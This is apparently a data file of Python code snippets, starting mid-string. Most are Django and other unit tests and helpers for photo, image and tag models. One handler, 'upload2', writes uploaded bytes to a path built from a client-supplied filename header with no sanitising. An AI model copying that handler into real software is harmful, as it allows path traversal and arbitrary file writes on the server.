reverse('photodetail')\t\n\t\tself.created_image = UserPhoto(image=self.image, name=self.image_name, created_by=self.user)\n\t\tself.created_image.save()\n\t\tresponse = self.client.get('/api/modify_photo/?id={}'.format(self.created_image.id))\n\t\tself.assertEqual(response.status_code, 
status.HTTP_200_OK)\n\t\tself.assertEqual(response.data.get('name'), self.image_name)\n\t\tos.remove('static/media/' + str(self.created_image.image))\n\t\tdel self.created_image", "def test_tags_limited_to_user_tags(self):\n\n user2 = create_user(\n fname='Test2',\n lname='User2',\n email='[email protected]',\n password='testpass2'\n )\n\n Tag.objects.create(user=user2, name='Vegan')\n tag = Tag.objects.create(user=self.user, name='Dessert')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def create_image(user_id, image_name, tag1, tag2, tag3):\n\n image = Image(user_id=user_id, image_name=image_name, tag1=tag1, tag2=tag2, tag3=tag3)\n\n db.session.add(image)\n db.session.commit()\n\n return image", "def test_equipment_by_id_image(self):\n pass", "def setUp(self):\n self.new_image = Images(image=\"image.jpg\", image_name=\"roses\", caption=\"live\",\n user_id=1, user='Joy', likes=0, posted_on=\"111-2019\")", "def test_tag_image_duplicate(self):\n\n message = {\n \"method\": \"build_image\",\n \"params\": {\"url\": self.url,\n \"tag_image\": self.tag_image}\n }\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"error\")", "def test_recipe_nutrition_by_id_image(self):\n pass", "def multi_tag_image(self, owner_userid, tag_userid, image_ids, tag_names):\n\t\ttry:\n\t\t\towner_userid = validation.cast_integer(owner_userid, 'owner_userid')\n\t\t\ttag_username = validation.cast_integer(tag_userid, 'userid')\n\t\texcept errors.ValidationError, ex:\n\t\t\treturn utils.return_deferred_error(ex.value)\n\n\t\tself.log.debug(\"about to tag %d images with %d tags\" % (len(image_ids), len(tag_names)))\n\t\tfor id in image_ids:\n\t\t\ttry:\n\t\t\t\tid = validation.cast_integer(id, 'image_id')\n\t\t\texcept errors.ValidationError, ex:\n\t\t\t\treturn utils.return_deferred_error(ex.value)\n\t\t\tself.log.debug(\"image %s\" % id)\n\n\t\t# do all inserts in a single transaction\n\t\tdef tag_txn(txn, owner, tagger, ids, tags):\n\t\t\tfor id in ids:\n\t\t\t\tid = validation.cast_integer(id, 'id')\n\t\t\t\tfor tag in tags:\n\t\t\t\t\ttag = tag.lower()\n\t\t\t\t\ttxn.execute(\"\"\"\n\t\t\t\t\t\tselect zoto_insert_user_image_tag(\n\t\t\t\t\t\t\t%s,\n\t\t\t\t\t\t\t%s,\n\t\t\t\t\t\t\t%s,\n\t\t\t\t\t\t\t%s\n\t\t\t\t\t\t)\n\t\t\t\t\t\"\"\", (owner, id, tag, tagger))\n\t\treturn self.app.db.runInteraction(tag_txn, owner_userid, tag_userid, image_ids, tag_names)", "def test_get_chef_with_photo(self):\n url = '/0/chefs/' + str(self.user.pk)\n headers = self.login()\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('chef', resp.data)\n self.assertNotIn('photo', resp.data['chef'])\n\n self.user.avatar_photos.create(s3_url='image') # Create photo\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('chef', resp.data)\n self.assertIn('photo', resp.data['chef'])\n keys = set(('id', 'url', 'creation_date', 'edit_date'))\n self.assertEqual(keys, set(resp.data['chef']['photo']))", "def images_init(self):\n\n self.user_image = UserImage(\n user_id=self.user_id,\n tag=self.tag_image,\n image_id='sha256:342fea22',\n created=1524229897,\n size=191623983\n )\n self.user_image.save()\n\n CLIENT.images_list.append(\n {'Containers': -1,\n 'Created': 1524229897,\n 'Id': 'sha256:342fea22',\n 'Labels': None,\n 'ParentId': 
'sha256:55d98c2',\n 'RepoDigests': None,\n 'RepoTags': [self.tag_image],\n 'SharedSize': -1,\n 'Size': 191623983,\n 'VirtualSize': 191623983}\n )", "def setUp(self):\n self.new_user = User(\n username=\"Hey\", email=\"[email protected]\", password=\"heyjfbghjdnf\")\n self.new_user.save()\n self.new_image = Image(name='Hey', user=self.new_user)\n self.new_image.save()", "def test_profile_image_requested_field(self):\n user_2 = UserFactory.create(password=self.password)\n # Ensure that parental controls don't apply to this user\n user_2.profile.year_of_birth = 1970\n user_2.profile.save()\n source_threads = [\n self.create_source_thread(),\n self.create_source_thread({\"user_id\": str(user_2.id), \"username\": user_2.username}),\n ]\n\n self.register_get_user_response(self.user, upvoted_ids=[\"test_thread\"])\n self.register_get_threads_response(source_threads, page=1, num_pages=1)\n self.create_profile_image(self.user, get_profile_image_storage())\n self.create_profile_image(user_2, get_profile_image_storage())\n\n response = self.client.get(\n self.url,\n {\"course_id\": str(self.course.id), \"requested_fields\": \"profile_image\"},\n )\n assert response.status_code == 200\n response_threads = json.loads(response.content.decode('utf-8'))['results']\n\n for response_thread in response_threads:\n expected_profile_data = self.get_expected_user_profile(response_thread['author'])\n response_users = response_thread['users']\n assert expected_profile_data == response_users[response_thread['author']]", "def setUp(self):\n account_models.User.objects.create_user(email='[email protected]', password='WhoAmI', username='aov1')\n photo_models.PhotoClassification.objects.create_or_update(name='City',\n category_image=Photo(\n open('apps/common/test/data/photos/small.jpg',\n 'rb')),\n icon=Photo(\n open('apps/common/test/data/photos/small.jpg',\n 'rb')))\n abstract = photo_models.PhotoClassification.objects.create_or_update(name='Abstract')\n photo_models.PhotoClassification.objects.create_or_update(name='Rural', classification_type='category')\n photo_feed = photo_models.PhotoFeed.objects.create_or_update(name='Abstract')\n abstract.photo_feed = photo_feed\n abstract.save()", "def test_user_photo_retrieval_by_name_succeeds(self):\n\t\t# url = reverse('photodetail')\t\n\t\tself.created_image = UserPhoto(image=self.image, name=self.image_name, created_by=self.user)\n\t\tself.created_image.save()\n\t\tresponse = self.client.get('/api/image/?name={}'.format(self.created_image.name))\n\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n\t\tself.assertEqual(response.data.get('name'), self.image_name)\n\t\t\n\t\tos.remove('static/media/' + str(self.created_image.image))\n\t\tdel self.created_image", "def test_save_image(self):\n self.roses.save_image()\n image = Images.objects.all()\n self.assertEqual(len(image), 1)", "def testImageHandling(self):\n \n pm = getToolByName(self.portal, 'portal_membership')\n #make sure the person's member portrait isn't defined\n self.failUnless(pm.getPersonalPortrait('abc123').__name__ in ['defaultUser.gif', 'defaultUser.png'])\n \n # Delete the (nonexistant) image, make sure the portrait stays undefined\n self.person.setImage('DELETE_IMAGE')\n self.failUnless(pm.getPersonalPortrait('abc123').__name__ in ['defaultUser.gif', 'defaultUser.png'])\n \n self.person.setImage(TEST_GIF, content_type=\"image/gif\")\n #self.failUnlessEqual(self.person.getImage().data, TEST_GIF)\n # Try to get a 10x10 version of the image\n imageOfSizeTag = self.person.getImageOfSize(10, 10)\n 
self.failUnlessEqual(imageOfSizeTag, '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"10\" width=\"10\" />')\n self.failUnlessEqual(pm.getPersonalPortrait('abc123').__name__, 'abc123')\n \n # Try to get a scaled-by-ratio image with a width of 100.\n scaledImageTag = self.person.getScaledImageByWidth(100)\n self.failUnlessEqual(scaledImageTag, '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"150\" width=\"100\" />')\n \n # Delete the image, make sure the portrait is deleted as well\n self.person.setImage('DELETE_IMAGE')\n self.failUnless(pm.getPersonalPortrait('abc123').__name__ in ['defaultUser.gif', 'defaultUser.png'])\n \n #self.person.setImage(TEST_JPEG, content_type=\"image/jpeg\")\n #self.failUnlessEqual(self.person.getImage().data, TEST_JPEG)\n \n self.person.setImage(TEST_TIFF, content_type=\"image/tiff\")\n #self.failUnlessEqual(self.person.getImage().data, TEST_TIFF)\n # Try to get a 10x10 version of the image\n imageOfSizeTag = self.person.getImageOfSize(10, 10)\n self.failUnlessEqual(imageOfSizeTag, '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"10\" width=\"10\" />')\n \n # Try to get a scaled-by-ratio image with a width of 100.\n # TIFF handling in Plone is broken (probably the fault of PIL), handle the problem nicely.\n scaledImageTag = self.person.getScaledImageByWidth(100)\n self.failUnless(scaledImageTag == '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"150\" width=\"100\" />' or scaledImageTag == '')", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n '123456'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_add_tagitem(self):\n record = self.good_record()\n record['tag'] = self.tag\n # Create a fake record in mongo\n id = self.images.insert(record)\n\n status = self.m.add_tag(id, self.system, 'testtag')\n self.assertTrue(status)\n rec = self.images.find_one({'_id': id})\n self.assertIsNotNone(rec)\n self.assertIn(self.tag, rec['tag'])\n self.assertIn('testtag', rec['tag'])", "def test_get_photos(self):\n recipe = Recipes.objects.create(chef=self.user, draft=False, private=False)\n photo = Photos.objects.create(recipe=recipe, photo_order=1)\n\n url = '/0/chefs/%i/photos' % self.user.pk\n\n resp = self.client.get(url)\n self.assertPermissionDenied(resp)\n\n headers = self.login()\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('photos', resp.data)\n self.assertEqual(1, len(resp.data['photos']))\n keys = ('edit_date', 'creation_date', 'id', u'temperature', 'url', 'recipe', 'cover',\n 'time', 'instructions', 'order', 'quantity')\n self.assertEqual(set(keys), set(resp.data['photos'][0].keys()))", "def setUp(self):\n\t\tself.username = fake.user_name()\n\t\tself.password = fake.password()\n\n\t\tself.image_name = 'test.png'\n\t\tself.img_url = 'static/img/test.png'\t\n\n\t\tself.user = User.objects.create_user(\n\t\t\tusername=self.username, password=self.password)\n\t\tself.user = authenticate(username=self.username, 
password=self.password)\n\t\tself.client.login(username=self.username, password=self.password)\n\n\t\tself.image = Image.frombytes('L', (100, 100), \"\\x00\" * 100 * 100)\n\t\tself.image = pil_to_django(self.image, 'png')\n\n\t\tself.created_image = UserPhoto(image=self.image, name=self.image_name, created_by=self.user).save()", "def test_tags_limited_to_user(self):\n imposter = get_user_model().objects.create_user(\n email='[email protected]', password='im_an_imposter')\n Tag.objects.create(user=imposter, name='BAD_FOOD')\n tag = Tag.objects.create(user=self.user, name='fruit')\n res = self.client.get(TAG_URL)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_m2m_dependent_object_import_precision(self): #: TODO: Come up with a better name\n other_company = Company.objects.create(name='Other Co', natural_id='oc')\n _,other_user_profile = create_base_models(username='other', company=other_company)\n\n #: Create same named tags <-- assert later that they do not get filtered out as they are from a different\n #: company\n blue = Tag.objects.create(\n company=other_company,\n created_by=other_user_profile,\n name='blue',\n slug='blue',\n rank=0\n )\n green = Tag.objects.create(\n company=other_company,\n created_by=other_user_profile,\n name='green',\n slug='green',\n rank=2\n )\n\n user_profile: UserProfile = self.user_profiles[0] # See self.setUp()\n\n # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************\n # Initialize Importers\n image_manager = ImporterManager(importer=ImageImporter())\n tag_manager = ImporterManager(importer=TagImporter())\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,image in enumerate(self.images):\n user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row,image in enumerate(self.images):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n tag_manager.update_kvs('slug', 'blue', row=0, col=0)\n tag_manager.update_kvs('slug', 'green', row=0, col=1)\n #: Anyway to avoid pushing these redundant kvs accross a row (??)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)\n # tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=1)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)\n # tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=1)\n\n tag_manager.update_kvs('slug', 'yellow', row=1, col=0)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)\n\n #: Retrieve associate intermediate data\n tag_manager.get_available_rows()\n\n 
self.assertEqual(len(tag_manager.get_object_or_list(0)), 2)\n for tag in tag_manager.get_object_or_list(0):\n self.assertEqual(tag.company_id, self.company.id)\n self.assertNotEqual(tag.company_id, other_company.id)\n\n self.assertIsInstance(tag_manager.get_object_or_list(1), Tag)", "def upload2(request):\n uploaded = request.read\n fileSize = int(uploaded.im_self.META[\"CONTENT_LENGTH\"])\n fileName = uploaded.im_self.META[\"HTTP_X_FILE_NAME\"] \n fileContent = uploaded(fileSize)\n \n \"\"\"Write image to disk.\"\"\"\n fn, ext = os.path.splitext(fileName)\n name = fn + timezone.now().strftime(\"%Y_%m_%d_%H_%M_%S_%f\") + base64.urlsafe_b64encode(os.urandom(settings.SALT_LENGHT)) + ext\n fileHandler = open(settings.MEDIA_ROOT + \"images/\" + name, \"wb\")\n fileHandler.write(fileContent)\n fileHandler.close()\n \n \"\"\"Create md5hash digest for image.\"\"\"\n base64string = base64.b64encode(fileContent)\n mdfive = md5.new(base64string).hexdigest()\n \n \"\"\"Write image data to db.\"\"\"\n latitude = request.GET.get('lat')\n longitude = request.GET.get('lon')\n tags = request.GET.get('tags').split(' ')\n\n image = Image(title = name, md5hash = mdfive, pub_date = timezone.now(), lat = latitude, lon = longitude)\n image.save()\n\n for tagtext in tags:\n if Tag.objects.filter(name=tagtext).exists():\n t = Tag.objects.get(name=tagtext)\n else:\n t = Tag(name = tagtext)\n t.save()\n image.tags.add(t)\n image.save()\n\n return HttpResponse('{\"success\": true}')", "def test_tags_limited_to_user(self):\n user2 = create_user('[email protected]', 'OtherPassword')\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Home Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_statistics_view_set_photo_get_successful(self):\n # Create test users\n user = account_models.User.objects.create_superuser('[email protected]', 'pass')\n user.is_admin = True\n user.created_at = datetime(year=2016, month=12, day=31)\n user.save()\n\n user_1 = account_models.User.objects.create_user('[email protected]', 'test1', 'pass')\n user_1.created_at = datetime(year=2017, month=1, day=12)\n user_1.save()\n\n user_2 = account_models.User.objects.create_user('[email protected]', 'test2', 'pass')\n user_2.created_at = datetime(year=2017, month=1, day=15)\n user_2.save()\n\n user_3 = account_models.User.objects.create_user('[email protected]', 'test3', 'pass')\n user_3.created_at = datetime(year=2017, month=1, day=29)\n user_3.save()\n\n user_4 = account_models.User.objects.create_user('[email protected]', 'test4', 'pass')\n user_4.created_at = datetime(year=2017, month=1, day=31, hour=23, minute=59, second=59)\n user_4.save()\n\n user_5 = account_models.User.objects.create_user('[email protected]', 'test5', 'pass')\n user_5.created_at = datetime(year=2017, month=2, day=17)\n user_5.save()\n\n user_6 = account_models.User.objects.create_user('[email protected]', 'test6', 'pass')\n user_6.created_at = datetime(year=2017, month=2, day=21)\n user_6.save()\n\n user_7 = account_models.User.objects.create_user('[email protected]', 'test7', 'pass')\n user_7.created_at = datetime(year=2017, month=3, day=1, hour=0, minute=0, second=0)\n user_7.save()\n\n # Create test photos\n category_1 = photo_models.PhotoClassification.objects.get(name='Other')\n category_2 = photo_models.PhotoClassification.objects.get(name='Urban')\n\n photo_1 = 
photo_models.Photo.objects.create(image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_1.category.set([category_1])\n photo_1.created_at = datetime(year=2017, month=1, day=10)\n photo_1.save()\n\n photo_2 = photo_models.Photo.objects.create(\n user=user_1, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_2.category.set([category_1])\n photo_2.created_at = datetime(year=2017, month=1, day=12)\n photo_2.save()\n\n photo_3 = photo_models.Photo.objects.create(\n user=user_2, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_3.category.set([category_2])\n photo_3.created_at = datetime(year=2017, month=1, day=16)\n photo_3.save()\n\n photo_4 = photo_models.Photo.objects.create(\n user=user_3, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_4.category.set([category_1])\n photo_4.created_at = datetime(year=2017, month=1, day=31)\n photo_4.save()\n\n photo_5 = photo_models.Photo.objects.create(\n user=user_4, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_5.category.set([category_1])\n photo_5.created_at = datetime(year=2017, month=2, day=2)\n photo_5.save()\n\n photo_6 = photo_models.Photo.objects.create(\n user=user_5, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_6.category.set([category_1])\n photo_6.created_at = datetime(year=2017, month=2, day=18)\n photo_6.save()\n\n photo_7 = photo_models.Photo.objects.create(\n user=user_6, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_7.category.set([category_1])\n photo_7.created_at = datetime(year=2017, month=2, day=23)\n photo_7.save()\n\n photo_8 = photo_models.Photo.objects.create(\n user=user_7, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_8.category.set([category_2])\n photo_8.created_at = datetime(year=2017, month=3, day=1)\n photo_8.save()\n\n photo_9 = photo_models.Photo.objects.create(\n user=user_7, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_9.category.set([category_2])\n photo_9.created_at = datetime(year=2017, month=3, day=2)\n photo_9.save()\n\n client = APIClient()\n client.force_authenticate(user)\n\n request = client.get('/api/statistics/photos')\n results = request.data['results']\n\n self.assertEquals(len(results), 4) # 3 months of data\n self.assertEquals(results[0]['date'], '2016-12-1')\n self.assertEquals(results[0]['average_photos_per_user'], 0)\n self.assertEquals(results[1]['date'], '2017-1-1')\n self.assertEquals(results[1]['average_photos_per_user'], 0.80)\n self.assertEquals(results[2]['date'], '2017-2-1')\n self.assertEquals(results[2]['average_photos_per_user'], 1.0)\n self.assertEquals(results[3]['date'], '2017-3-1')\n self.assertEquals(results[3]['average_photos_per_user'], 1.12)", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'testpass'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def tag_image(self, owner_userid, tag_userid, image_id, tag_name):\n\t\ttry:\n\t\t\towner_userid = validation.cast_integer(owner_userid, 'owner_userid')\n\t\t\ttag_userid = validation.cast_integer(tag_userid, 'userid')\n\t\t\timage_id = validation.cast_integer(image_id, 
'image_id')\n\t\t\tvalidation.required(tag_name, 'tag_name')\n\t\texcept errors.ValidationError, ex:\n\t\t\treturn utils.return_deferred_error(ex.value)\n\t\ttag_name = tag_name.strip()\n\t\t@stack\n\t\tdef tag_txn(txn, owner, tagger, image, tag):\n\t\t\ttag = tag.lower()\n\t\t\ttxn.execute(\"\"\"\n\t\t\t\tselect zoto_insert_user_image_tag(%s, %s, %s, %s)\n\t\t\t\"\"\", (owner, image, tag, tagger))\n\n\t\treturn self.app.db.runInteraction(tag_txn, owner_userid, tag_userid, image_id, tag_name)", "def test_save_image(self):\n self.new_image.save_image()\n self.assertTrue(len(Image.objects.all()) > 0)", "def model_processing(img):\n\n # assert isinstance(img, EmotionalImage)\n\n if str(img.name).find('json') > -1:\n return\n user = get_user(img.path + '/' + 'meta.json')\n filePath = img.path + '/' + img.name\n # print(\"---------------Processsing----------------\", img.name)\n\n features = extract_features(filePath)\n emotions = predict_emotions(features)\n uuid1 = uuid.uuid4()\n emImage = EmotionalImage(\n uuid1, img.name, img.path, features, emotions, \"\", \"\", \"\")\n user.images.append(emImage)\n # user.save()", "def test_photos_limited_to_user(self, api_client, test_user):\n\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'password123'\n )\n sample_photo(user=user2)\n sample_photo(user=test_user)\n\n api_client.force_authenticate(test_user)\n res = api_client.get(PHOTO_URL)\n\n photos = Photo.objects.filter(user=test_user)\n serializer = PhotoSerializer(photos, many=True)\n\n assert res.status_code == status.HTTP_200_OK\n assert len(res.data) == 1\n assert res.data == serializer.data", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n 'Other User', '[email protected]', 'otherpassword')\n Tag.objects.create(user=user2, name='Nonveg')\n tag = Tag.objects.create(user=self.user, name='Fruity')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def create_fake_data():\n s = Story.objects.create(body=\"farfrompuken is so awesome, i just love it.\",\n author_name=\"jared nuzzolillo\")\n\n img_urls = (\"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-B.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-D.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/l-f.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-K.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/l-m.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-P.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-T.png\",)\n\n for i, img_url in enumerate(img_urls):\n StoryImage.objects.create(\n story=s,\n image=Image.objects.create(\n url=img_url,\n name=\"name %d\" % i,\n author_name=\"Johnny %d Times\" % i,\n author_url=\"http://somewherecool%d\" % i,\n uppercase=\"uppercase %d\" % i,\n typeface=\"typeface %d\" % i))", "def test_get_image_id(self):\n self.roses.save_image()\n image_id=Images.get_image_id(self.roses.id)\n self.assertTrue(image_id.id==self.roses.id)", "def sample_photo(user, title='Lovely Photo'):\n return Photo.objects.create(user=user, title=title)", "def test_create_image(self):\n pass", "def test_photo_classification_view_set_post_update(self):\n # Test data\n user = account_models.User.objects.get(email='[email protected]')\n\n # Simulate auth\n token = 
test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'tag'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n result = request.data\n\n self.assertEquals(result['name'], 'Night')\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n self.assertEquals(len(classifications), 12)\n self.assertEquals(classifications[11].name, 'Night')", "def test_tags_limited_to_user(self):\n\n user2 = get_user_model().objects.create_user(\n email='[email protected]',\n password='23pass1234&'\n )\n\n Tag.objects.create(user=self.user, name='Vegan')\n Tag.objects.create(user=self.user, name='Dessert')\n Tag.objects.create(user=user2, name='Valami mas')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), len(tags))\n self.assertEqual(res.data, serializer.data)", "def test_edit_image_instance(self):\n self.client.force_authenticate(self.user1)\n data = {\n \"img_name\": \"photo_user1\",\n \"img_description\": \"photo of user1\",\n \"favourite\": True,\n \"width\": 700,\n \"height\": 500,\n \"share_user\": [],\n }\n url = reverse(self.url_name_one, args=(1,))\n response = self.client.put(url, data, format=\"multipart\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n # Get edited object, convert to dict and compare with inputs\n obj = model_to_dict(Images.objects.get(id=1))\n for field, edited_data in data.items():\n self.assertEqual(edited_data, obj[field])\n # Check if image was edited to a new input\n edited_img = Image.open(self.test_pic_folder + \"/test.png\")\n self.assertEqual(edited_img.size, (700, 500))", "def test_recipe_taste_by_id_image(self):\n pass", "def test_add_same_image_two_system(self):\n record = self.good_record()\n record['tag'] = self.tag\n # Create a fake record in mongo\n id1 = self.images.insert(record.copy())\n # add testtag for systema\n status = self.m.add_tag(id1, self.system, 'testtag')\n self.assertTrue(status)\n record['system'] = 'systemb'\n id2 = self.images.insert(record.copy())\n status = self.m.add_tag(id2, 'systemb', 'testtag')\n self.assertTrue(status)\n # Now make sure testtag for first system is still\n # present\n rec = self.images.find_one({'_id': id1})\n self.assertIsNotNone(rec)\n self.assertIn('testtag', rec['tag'])", "def test_profile_image_requested_field(self):\n source_comments = [self.create_source_comment()]\n self.register_get_thread_response({\n \"id\": self.thread_id,\n \"course_id\": str(self.course.id),\n \"thread_type\": \"discussion\",\n \"children\": source_comments,\n \"resp_total\": 100,\n })\n self.register_get_user_response(self.user, upvoted_ids=[\"test_comment\"])\n self.create_profile_image(self.user, get_profile_image_storage())\n\n response = self.client.get(self.url, {\"thread_id\": self.thread_id, \"requested_fields\": \"profile_image\"})\n assert response.status_code == 200\n response_comments = json.loads(response.content.decode('utf-8'))['results']\n for response_comment in response_comments:\n expected_profile_data = self.get_expected_user_profile(response_comment['author'])\n response_users = response_comment['users']\n assert expected_profile_data == response_users[response_comment['author']]", "def 
test_update_multiple(self):\n tag_id = \"update_photo_tag\"\n # Get a couple of photos\n photos = self.photos[:2]\n\n # Add the tag using a list of photo objects\n self.client.photos.update(photos, tagsAdd=tag_id)\n\n # Check that it's there\n for photo in self.client.photos.list()[:2]:\n self.assertIn(tag_id, photo.tags)\n\n # Remove the tags using a list of photo ids\n self.client.photos.update([photo.id for photo in photos],\n tagsRemove=tag_id)", "def setUp(self):\n fun = Category(name=\"funny\")\n fun.save()\n lagos = Location(name=\"Lagos\")\n lagos.save()\n self.new_image = Pics(\n name=\"image\", description=\"h\", location=lagos, category=fun)", "def test_tags_limited_to_user(self):\n user2 = User.objects.create(\n email='[email protected]',\n password='test_password'\n )\n Tag.objects.create(user=user2, name='Fruity')\n Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serializer.data)", "def test_photo_classification_view_set_get_filtered_successful(self):\n # Test data\n user = account_models.User.objects.get(email='[email protected]')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n request = client.get('/api/photo_classifications?classification=tag')\n results = request.data['results']\n\n self.assertEquals(len(results), 2)", "def test_type_image(image):\n resource = models.MediaResource(image=image)\n\n assert resource.type == models.MediaResource.TYPE_IMAGE", "def test_create_recipe_with_tags(self):\n tag1 = sample_tag(user=self.user,name='vegan')\n tag2 = sample_tag(user=self.user, name='dessert')\n payload = {\n 'title':'cheesecake',\n 'tag':[tag1.id,tag2.id],\n 'time_minutes':60,\n 'price':10.00,\n }\n res = self.client.post(RECIPE_URL,payload)\n self.assertEqual(res.status_code,status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(id=res.data['id'])\n tags = recipe.tag.all()\n self.assertEqual(len(tags),2)\n self.assertIn(tag1,tags)\n self.assertIn(tag2,tags)", "def test_image_uploads_on_save(self):\n \n files_count = len(os.listdir(settings.MEDIA_ROOT + '/persons'))\n with open('media/test_images/test.jpg') as f:\n self.client.post(reverse('edit'), {'ava': f})\n files_count_after = len(os.listdir(settings.MEDIA_ROOT + '/persons'))\n # added file and thumbnail\n self.assertEquals(files_count_after - files_count, 2) \n \n # test image scales \n from PIL import Image\n im = Image.open(settings.MEDIA_ROOT + '/persons/test.thumbnail.jpg')\n thumbnail_size = Person.thumbnail_size\n self.assertEquals((thumbnail_size,thumbnail_size), im.size)", "def test_api_thumbnail_retrieve_by_random_user(self):\n user = UserFactory()\n\n self.assert_user_cannot_retrieve_thumbnail(user, self.some_thumbnail)", "def test_get_imagelist_inmutable(self):\n images1 = self.mock_master.get_imagelist(self.region1)\n images2 = self.mock_master.get_imagelist(self.region1)\n r2dict = dict((i.id, i) for i in images2)\n self.assertEquals(images1, images2)\n self.assertNotEquals(id(images1), id(images2))\n for image in images1:\n self.assertIn(image.id, r2dict)\n image2 = r2dict[image.id]\n self.assertEquals(image, image2)\n self.assertNotEquals(id(image), id(image2))\n 
